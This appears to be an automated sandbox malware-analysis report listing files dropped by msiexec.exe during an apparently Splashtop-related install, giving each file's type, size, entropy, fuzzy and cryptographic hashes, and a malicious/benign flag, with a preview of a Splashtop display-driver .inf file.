                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.040113518412221
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Dq8YdZrnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9NH7:Dqjd9nYPL/p1P6j7rd7
                                                                                                                                                                                                                                                                                                                                  MD5:3C1EBF4DFC9685F1D584F0D6F421391C
                                                                                                                                                                                                                                                                                                                                  SHA1:99FB5FD1A755AC038818776C6FCB964FD027334F
                                                                                                                                                                                                                                                                                                                                  SHA-256:237BC4CD7AC38B503EF2D319C484EEAE07562AB09629C218B5C5BEEB8D5A8586
                                                                                                                                                                                                                                                                                                                                  SHA-512:84C5DCFBAEA40091F7D1D5003414FFA8926B3CEFFADD08071297C5F5A6929557D8EF36BE22181431CA56E773669CD1F15DCFA16494C935EF0C15707102A4A73F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.807178448617145
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:KHpo0tYsmKZWZ3/ECwTnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lfr9mOsPkHsV:Pe+jwTnYPL/p1P6j7TmOfHsV
                                                                                                                                                                                                                                                                                                                                  MD5:36F961C6308CB0B919E659EB1B738AFA
                                                                                                                                                                                                                                                                                                                                  SHA1:FC795A8FD24CBB3267474D99922CFF1BEE5F242D
                                                                                                                                                                                                                                                                                                                                  SHA-256:4212786F0C3D5A00502A5926DE4E111BC9ABB84A4953C93DA6E17DCE4EC902E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:923A0C4B1454C4DEDA5AFD423B34D51FD9AECBBFC610006FC062CF031C81D4A2FDC94098E9DCA4FC16B25FE0766ECDEC12F450E8E4BC701F17832D3715F70C91
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.022305855965037
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cdot9XqRolBJB3gP9tRHY8QjSec95NLnYe+PjPGyz/wOgjJ5Q7:cduaCvJQY8QjSz9vnYPLGKGI
                                                                                                                                                                                                                                                                                                                                  MD5:AF512AA3612DEA5C2E2FAE866898EED5
                                                                                                                                                                                                                                                                                                                                  SHA1:803810F8648832AB81DDF3B3C5862077EF6AFD4F
                                                                                                                                                                                                                                                                                                                                  SHA-256:FBBEE200CBD1663A0F6D6F9FAD4502004DD4922C2257CC8AF6CBFB4DE1CBDB12
                                                                                                                                                                                                                                                                                                                                  SHA-512:857D6F4F13ADACE91E7C90B6CADF601C87F3D98C9916C3D6079B153A48B7A9F16A5DB79B92D9E087F1646FE12DD65890292475D2D4DD0C823354EAA0B4BA5939
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4694
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249583632564649
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:E+5iOJLGq6BFPmfsLkfsof96zdUyLiypkTsTetTtqBlFL+WC:E+5iOJLGqsFPmfsLkfs86zdUyLiypkAU
                                                                                                                                                                                                                                                                                                                                  MD5:BA4F5D984CB8611E64BFCEDE9C3B8E93
                                                                                                                                                                                                                                                                                                                                  SHA1:AC67AA1C6C892FC04FC740647815F74C6671DD34
                                                                                                                                                                                                                                                                                                                                  SHA-256:A31E1D6AE465C93B847D47BCECAE94E24B918BFF73DD7D9B31E6789322591DDD
                                                                                                                                                                                                                                                                                                                                  SHA-512:16F3528FA573C612A0CF1BB772FB3C3DE2C4EBA619621E33DE0337D0954DE115BA39FAD0D7FD9816849E2BBC430EB84AAA802AA9F861F0B94EC890C9E19BCEBD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; stvideo.inf..;..; Installation file (.inf) for the splashtop device...;..; (c) Copyright 2011-2014 Splashtop drivers ..;....[Version]..Signature="$CHICAGO$"..Provider=%splashtop%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=03/31/2014,1.0.2.0..CatalogFile="stvideo.cat"....[SourceDisksNames]..99 = %DiskId%,,,....[SourceDisksNames.amd64]..99 = %DiskId%,,,\64bits....[SourceDisksFiles]..stvideo.dll = 99..stmirror.dll = 99..stvideo.sys = 99..stmirror.sys = 99....[DestinationDirs]..DefaultDestDir = 11..stvideo.Miniport = 12..stvideo.Display = 11..stmirror.Display = 11..stmirror.Miniport = 12....[Manufacturer]..%splashtop% = stvideo_Mfg, NTx86, NTamd64....[stvideo_Mfg.NTx86]..%splashtop.DeviceDesc% = stvideo, STVideo_Driver..%splashtop.DeviceDesc% = stvideo_win7, STVideo_Driver_Win7..%splashtop.MirrorDeviceDesc% = stmirror, STMirror_Driver....[stvideo_Mfg.NTamd64]..%splashtop.DeviceDesc% = stvideo, STVideo_Driver..%splashtop.DeviceDesc% = stvi
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.040343349200973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Ddg2s4nYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9xu5eF:Di2hnYPL/p1P6j7rxbF
                                                                                                                                                                                                                                                                                                                                  MD5:46DF2F9B00DA96B8603F472EC4BEB416
                                                                                                                                                                                                                                                                                                                                  SHA1:AFB25F23A849DAFECA73DFA6B0DF428619F6224E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8196CA7ED6BF904E00E2A2955AC8288801AA3983384268D5DF85F52AE10FC974
                                                                                                                                                                                                                                                                                                                                  SHA-512:0284D0D1A025AED097C375343018DF023A7058CF741BFDE9D97DC647548BD18C05B068268818E6542954BDBB1FDF0B992277C565865A2084DF9BFA2E33A9FBDC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.214858942297855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:T6pztvRXL6L1T9mV0OTpJoNGDP5t2IhmX+o:T4tmL1EXCNGVt2IhmX+o
                                                                                                                                                                                                                                                                                                                                  MD5:3B83E955AB0C3A815E0ED69EB6407C52
                                                                                                                                                                                                                                                                                                                                  SHA1:995657C40BC9A28D36AFEA59FE8549B916F81B95
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C2EBB467661D404BCA91A080CCA0E5836797EFC474B62A3D22FB3419E3C8B52
                                                                                                                                                                                                                                                                                                                                  SHA-512:1943EB1AFE81116657CBB33E87C7683CCF6D9EF22F59E5CEE840705E486A176DB5A7D67114A46ECDFC47A1B351F94DDEC72A05BDFB29CA6709CC696D877FDEBA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):542216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.466753301083591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:TXL84WA5C/KIcgHrlti0XoppdpRFT/FKf51PnofX09v:TXL84lopcgRti9FT/FKvnuX4v
                                                                                                                                                                                                                                                                                                                                  MD5:BB241F864550BFA8AD2346C65E0CE41C
                                                                                                                                                                                                                                                                                                                                  SHA1:378769EE7D6CA44554103E6A23F1BD20BB9E2564
                                                                                                                                                                                                                                                                                                                                  SHA-256:58C4394BBE98BA2B9344209CDC98F5DB854A385ABEB4C74BD111B0ED661D1D61
                                                                                                                                                                                                                                                                                                                                  SHA-512:68CF0A4CC802A10C218B3155D427DA5DFB6EDEA7671A41D016A5844011896C84490123E008CDAC2A4C5C60150B777F6742BA47A95050DFC1DBDEE20E332765EC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2816416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.82236063017737
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:wVaHMTDMmyUZe4RF+A8LO9Us1BXEne0Nxx4kta2R74IIjvmIFe5mxoDpuBw1s31n:wVTuERKy9v1BXEne0Nxx4kta2V4IIjvZ
                                                                                                                                                                                                                                                                                                                                  MD5:DF362B11095D0F59ECF9DDC0DAF61B12
                                                                                                                                                                                                                                                                                                                                  SHA1:6BB3B490F048FD1306D714651F6C2C488BC318D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BAFA22DA91BF2B44E4EFBBDFB8D7FB64B6F8A04569F2737EA49C384CDAD193F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:0A03BBF0DEF16E78556041DAC5EF003957384C37F07B08EBC0917921DC30189C2E3CFF7F91F369BD7195A8EE3E84D194113F0D889897C5679DEA263F27821FFE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):465928
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6188868975232875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nmELSchToqY92QUOMIsV7iPSdutxml26jmlE662:bnAUF1pAb
                                                                                                                                                                                                                                                                                                                                  MD5:12A3EF8EF5D70994B9500FA0801F8903
                                                                                                                                                                                                                                                                                                                                  SHA1:C06C2AC1CC4B7D50DDFD36E32CDB2274618294B7
                                                                                                                                                                                                                                                                                                                                  SHA-256:520C5A35F943B06888A96339EB2B8B5BEEB70046B5835DC0190AF77B4E0824FC
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF4AE07C1F2A636D57F5FA64505CE8CA581FAFD450DAC9FFAED69B84259BC21A3632E401577FA996C5C699352B07325CA7CB4CF82FD46E3C98E506E08B3125E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2581408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8335475472495375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bGF1tZkcS3fy3i9Ov8l6/kKkN6PLsCzvDxg7abakf35UXAtuwHgLYV1G4DW1L6Ky:bs1kcS3fy3pv8l6/kKqiLpPuabakf35n
                                                                                                                                                                                                                                                                                                                                  MD5:348AF13556E619DA13459047DAB625B9
                                                                                                                                                                                                                                                                                                                                  SHA1:6F3CB9022C715AFC6156A44A73D9D10147AB6CA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:75BDBB78A7CEE839496A8E643E2E631D04E243C4B466F3AF7FCD8C8A01288807
                                                                                                                                                                                                                                                                                                                                  SHA-512:344C43F62910CF5D1B31AA3A17E0A581C438055D49DC59071574F3D1A500C0945AFE89C2AB54045140B4EB79221B5A7E0814056C5600055FD3A0D458436D9CC0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3116552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.392745373577217
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bPZ5TNGpStg+wTMz3Q8giStLONyAppqk8W+OcVpcL0865eGzYPcL1l:gtMziR8k1DcLv6xL1l
                                                                                                                                                                                                                                                                                                                                  MD5:9CA925B6A0CFA7F8B0222233B3494D05
                                                                                                                                                                                                                                                                                                                                  SHA1:20EF67FDEA63178B92D2BF4755C02687DC9D9022
                                                                                                                                                                                                                                                                                                                                  SHA-256:5C66BE5F5D9A8CD7CBD5F31EF3AAFE7A422186E9B21AC564B58362508BF0583A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FBF69CAB559363EE0C16E4F04A7A3BED101B1B7D96383D2E092DE6EED505522CC7D1FEA1900FB0A63293BDEE34A5006583A1540D61043439CCE4EB12FF505879
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.549378989734658
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3mFO3OkMgk4tx/knVGuOA0R2dEpYiTPxchfU49:3SO3trenVODR2W7TPxchfUg
                                                                                                                                                                                                                                                                                                                                  MD5:48C3A4A2FA37A0BFC5BD90874A63AF44
                                                                                                                                                                                                                                                                                                                                  SHA1:27A3FBF2603B36DD972401CF8B976FBC282A2C3D
                                                                                                                                                                                                                                                                                                                                  SHA-256:3822BE932AED0A6E5C5A9F3CD80440AD96C8248F187F67324221A58AF5276296
                                                                                                                                                                                                                                                                                                                                  SHA-512:F261A54AF5B0204B8018B5844CDDA6BDC1F399AB3375BF171B8E7081A9BCA583D061F7182EA140E5E2A9E42916C78C2C7256AF516B15EC16AD51AD8ADFBC57EA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2403848
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7207202597413875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:FgGdcX0zBXVSNi2z4xw4G7NyzRP1ikMHeBNWHr:F4X2ikxwTNsi7
                                                                                                                                                                                                                                                                                                                                  MD5:4CF09B45FEE4FD22DC22B0AF706E4D80
                                                                                                                                                                                                                                                                                                                                  SHA1:86A6E08A3F7C315F1FDE9A9499EE91EE6A0F1407
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D925CF495ED97B7B73F7A93B01F7C529B55EB4581479120D235DC9263D06A3D
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD4B8E15B5A2C0B5045F039E2498D1CEFA5BB4913E302C56E6B84526279D36378D87E9269435B5AF644BA019CF056BF47E818F192FDD9D35F1AC8CF8D6DDD531
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.708144938787245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:EJVI3R0H/aWeIUhwNslRPbJyRefvcO+mVMWehLNyb8E9VF6IYiTPxcbdGgktyVEF:EJKMC8NsLPtxcO+AMPlEpYiTPxchOF
                                                                                                                                                                                                                                                                                                                                  MD5:A958758134E6D61D45BA0C4968380A8B
                                                                                                                                                                                                                                                                                                                                  SHA1:F40142518B13782CD2A06844CD8147B337E459DA
                                                                                                                                                                                                                                                                                                                                  SHA-256:30FD28720C7235F45140ED0642A4C71FF0DB1E93362D5694D87026DDA14992F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:1645C335C36AAC6A6BD2A74E41F7176776E70B696705F491CA8CCD6E99A54C3ECBC52E8BA081E9B0E57F5C08E0546D5302A7D28D72C350EC08446D54457360D1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):107312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.447984928648711
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:BTeWLZrzci/8dbquofWnRADp2y6hX2hbTYzLhrhkphDZ52DBXN+vl/DFS:BCWFfqbqaGnGzLhr82DBXN+v2
                                                                                                                                                                                                                                                                                                                                  MD5:BCEF2D42768A816AF7CD60391CBA3C0E
                                                                                                                                                                                                                                                                                                                                  SHA1:E17EC512C595318DC5F282CB73B71CFCB0B52A7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0EA236D80EFFA865F73E728D06790AB5583660EC915C979E8D96CAF692B6FE80
                                                                                                                                                                                                                                                                                                                                  SHA-512:389B36A464C417AAAE16A229F004A01D4F1EBC8F3D8E8A4D12B5AA82D9BA5EDE4A139B3999BAF1D9BF862D3B4BD5A6A0D89CC0A3561E8CA15EF19AA771DEE475
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.281018016209332
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:TMM1hIpiOe7unK1L0RW7Z4tk05ZpJBkkmN6/2EvK6k:TMM/hOeSK1DZ4tk0/B7OEvK6k
                                                                                                                                                                                                                                                                                                                                  MD5:8CED2B2F0E61A1BA20D63B24A41E1234
                                                                                                                                                                                                                                                                                                                                  SHA1:9731E2756EAB7A902DA1A72C0F1DC008425037C5
                                                                                                                                                                                                                                                                                                                                  SHA-256:44DB8AF61B92B39C805B136D2FB608D9D9082F051DDBD9AEE9E3A760B34EFF13
                                                                                                                                                                                                                                                                                                                                  SHA-512:087596DC595B786D74087BCEEA2F1A9B46F4EADCB1162201F32CB05B9BD207520C617AD849CD52788B5C2E579CF72B2B1BB7A5265D10B450B5E6FB8D17D1C07B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):91432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.020228136904558
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5UBy2mcawf1jBALblIkWHgMCtd+DIO6iUY:SyNcRjyLKGMCtd+DtDUY
                                                                                                                                                                                                                                                                                                                                  MD5:B510DA2C973FEB05803F124D0507D3A4
                                                                                                                                                                                                                                                                                                                                  SHA1:8F1344CEF1DB998698E1467AD22E30ED3BCE584B
                                                                                                                                                                                                                                                                                                                                  SHA-256:A39DEBD7558B4E769AC277A7D05B532318AB7774490310F76BDFE9E55240D9CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:AFC90D52B19B5E8186C62F5F1B720AB68EB34A997D3099824C7396FCC74D1ED76063BA1541FAAD999806BCFCC375909636E48EF36957157AAD766256B2999E6A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):170960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.545608024132094
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:k4UWlA7/ZJoE1s76gv/vKnGStqzWTBflx+FOGqK1:PY7/3s76ginGS4zWTBQv
                                                                                                                                                                                                                                                                                                                                  MD5:27CA510E2DDFE647F742F98C2EC6A7F7
                                                                                                                                                                                                                                                                                                                                  SHA1:1F422E39770D9565460F881D078D8C335B678255
                                                                                                                                                                                                                                                                                                                                  SHA-256:41BA7791F830EFBDF5F942A0B6DCF98C6A7D37B7DC06EED21F86AFBED0215C9A
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACBF7A23FB033ADB314466324AF6D1C6F543F6FADB6439B3E80F35467432754396667C9CA511A4D8AC3178BB51CD61EA3D94755436EFA9231EA362282C5FA2E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):103432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.506978817245819
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ZHdKQFG0im9CyE0rWB4f/j7rvHLoFbGugan639SNxsWb8cdrAwxJ0pz2Bxnz7HxD:ZHu0im80GM//rvHiP6tSDr7J0uxnzV
                                                                                                                                                                                                                                                                                                                                  MD5:C7BFA03D3623CB5D6BDBAE1F74BE00DB
                                                                                                                                                                                                                                                                                                                                  SHA1:3E2006273153940B1BE991B2A34E29A968ACE73B
                                                                                                                                                                                                                                                                                                                                  SHA-256:A55839E5E0FF26BDE1618461EB0614D62C528B2C5F32660D169F0C23BABA1094
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD5E9A1AFF686FF53385A7D7A67BEF51946937D8212B03578D28D1DEE50F68C64542CCB61F32331BC72E8EB9A2967AFAF189A1F33712C170CC594EFDC578F3EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2360840
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.767339982053931
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:p1mJqhrtmYH8J+O9EKuVT/0QMcRp1wNeHP35Edm5wm/HmsF8hP4g39tm06xg2atO:pcshrtm48JvmKo0DcRvD38+wm0e
                                                                                                                                                                                                                                                                                                                                  MD5:3796CC5C6401E84AC96808194FFAE284
